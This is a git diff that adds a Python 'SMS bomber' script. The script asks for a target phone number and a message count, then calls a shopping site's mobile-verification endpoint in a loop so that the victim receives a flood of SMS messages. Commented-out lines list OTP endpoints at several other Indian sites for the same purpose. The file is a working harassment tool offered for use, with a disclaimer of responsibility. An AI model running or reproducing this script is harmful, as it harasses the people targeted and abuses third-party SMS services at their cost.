diff --git a/SMS_bomber.py b/SMS_bomber.py new file mode 100644 index 0000000..a7b2b64 --- /dev/null +++ b/SMS_bomber.py @@ -0,0 +1,51 @@ +from urllib.request import Request,urlopen +from urllib.parse import urlencode +import platform +import os +import time + +def banner(): + if platform.system().lower()=="windows": + os.system("cls") + else: + os.system("clear") + print(""" + + /$$$$$$ /$$ /$$ /$$$$$$ /$$$$$$$ /$$$$$$ /$$ /$$ /$$$$$$$ /$$$$$$$$ /$$$$$$$ + /$$__ $$| $$$ /$$$ /$$__ $$ | $$__ $$ /$$__ $$| $$$ /$$$| $$__ $$| $$_____/| $$__ $$ +| $$ \__/| $$$$ /$$$$| $$ \__/ | $$ \ $$| $$ \ $$| $$$$ /$$$$| $$ \ $$| $$ | $$ \ $$ +| $$$$$$ | $$ $$/$$ $$| $$$$$$ | $$$$$$$ | $$ | $$| $$ $$/$$ $$| $$$$$$$ | $$$$$ | $$$$$$$/ + \____ $$| $$ $$$| $$ \____ $$ | $$__ $$| $$ | $$| $$ $$$| $$| $$__ $$| $$__/ | $$__ $$ + /$$ \ $$| $$\ $ | $$ /$$ \ $$ | $$ \ $$| $$ | $$| $$\ $ | $$| $$ \ $$| $$ | $$ \ $$ +| $$$$$$/| $$ \/ | $$| $$$$$$/ | $$$$$$$/| $$$$$$/| $$ \/ | $$| $$$$$$$/| $$$$$$$$| $$ | $$ + \______/ |__/ |__/ \______/ |_______/ \______/ |__/ |__/|_______/ |________/|__/ |__/ + + By : D3XBugg3R + With <3 of T34M GCA + Note : I won't be responsible for any damage caused by this script, Use at your own risk +""") +#http://m.naaptol.com/faces/jsp/ajax/ajax.jsp?actionname=checkMobileUserExists&mobile= + +#https://securedapi.confirmtkt.com/api/platform/register?mobileNumber= + +#http://t.justdial.com/api/india_api_write/10aug2016/sendvcode.php?mobile= + +#http://www.quikr.com/SignIn?aj=1&for=send_otp&user= + +def send(num, counter, slep): + #url = ["https://securedapi.confirmtkt.com/api/platform/register?mobileNumber=","https://m.naaptol.com/faces/jsp/ajax/ajax.jsp?actionname=checkMobileUserExists&mobile=","https://t.justdial.com/api/india_api_write/10aug2016/sendvcode.php?mobile="] + url="https://m.naaptol.com/faces/jsp/ajax/ajax.jsp?actionname=checkMobileUserExists&mobile=" + data={"phone":num} + for x in range(counter): + banner() + print("Target Number : ", num) + print("Number of Message Sent : ", x+1) + result_url=url+num + resp1=Request(result_url) + urlopen(resp1) + time.sleep(slep) +try: + banner() + send(input("Enter Target Number : "), int(input("Enter Number of Messages : ")), 1) +except Exception as e: + print("Something is wrong please Re-run this script.") \ No newline at end of file